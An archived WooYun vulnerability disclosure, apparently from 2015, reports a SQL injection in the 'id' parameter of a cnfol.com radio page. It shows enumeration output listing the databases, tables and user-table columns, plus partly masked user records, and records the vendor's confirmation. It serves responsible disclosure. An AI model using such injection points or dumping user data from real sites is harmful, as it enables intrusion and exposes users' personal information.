乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-12: 细节已通知厂商并且等待厂商处理中 2015-08-13: 厂商已经确认,细节仅向厂商公开 2015-08-23: 细节向核心白帽子及相关领域专家公开 2015-09-02: 细节向普通白帽子公开 2015-09-12: 细节向实习白帽子公开 2015-09-27: 细节向公众公开
注射
http://radio.3g.cnfol.com/index.php?r=Radiostation/Detail&id=%E6%9D%A8%E6%9C%8B%E5%A8%81
参数id
available databases [3]:[*] cnfol_zjcj[*] information_schema[*] test
Database: cnfol_zjcj[38 tables]+---------------------+| Activity || Bl_Install || Bl_Keywords || Bl_Reflex || Bl_UserMobile || Bl_classify || Bl_contentfilter || Bl_resource || Bl_user || GK_AttenList || Invitation || InvitationCode || InvitationExchange || WdtVoice || WdtVoiceCount || backupZjcj_group || bk_blacklist || bk_flower || bk_group || bk_live || bl_con || bl_ref || bl_secret || syslog || tbAppStock || tbUserStockOptional || unscramble || unscramblexx || weidiantai1 || zjcj_androiddevice || zjcj_content || zjcj_content_201507 || zjcj_group || zjcj_iosdevice || zjcj_operate || zjcj_user || zjcj_userchat || zjcj_userjoin |+---------------------+
Database: cnfol_zjcjTable: Bl_user[14 columns]+---------------+--------------+| Column | Type |+---------------+--------------+| addtime | datetime || checkCode | varchar(500) || delstatus | int(11) || email | varchar(500) || headPic | varchar(500) || manage | int(11) || mobile | varchar(500) || point | int(11) || publishNumber | int(11) || replyNumber | int(11) || state | int(11) || userId | int(11) || userName | varchar(500) || userNick | varchar(500) |+---------------+--------------+
只dump几条出来
*****--------+-----------**********Nick | replyNumbe**********--------+-----------********** | 0 | &l**********^士 | 0 **********chao | 0 |********** | 0 |********** | 0 | &l********** | 0 | &l********** | 0 | &********** | 0 | ********** | 0 |**********果 | 0 **********^下1 | 0 ********** | 0 | &l**********^生 | 0 ********** | 0 | &l**********ao | 0 |********** | 0 | &**********^贴 | 0 **********68 | 0 |**********^尘 | 0 **********enger | 0 |**********ming405 | 0 |**********cchen | 0 |**********2370 | 0 |**********^奇 | 0 **********^ | 0 **********hang99 | 0 |**********8 | 0 **********n鱼 | 0 **********^户PH | 0 **********tj | 0 **********^想 | 0 **********tilla | 0 |**********68 | 0 |**********^鹰 | 0 **********2005 | 0 **********+-------------+--*****
点到为止
危害等级:高
漏洞Rank:15
确认时间:2015-08-13 10:24
感谢提供漏洞信息,我们会立即修复漏洞。
暂无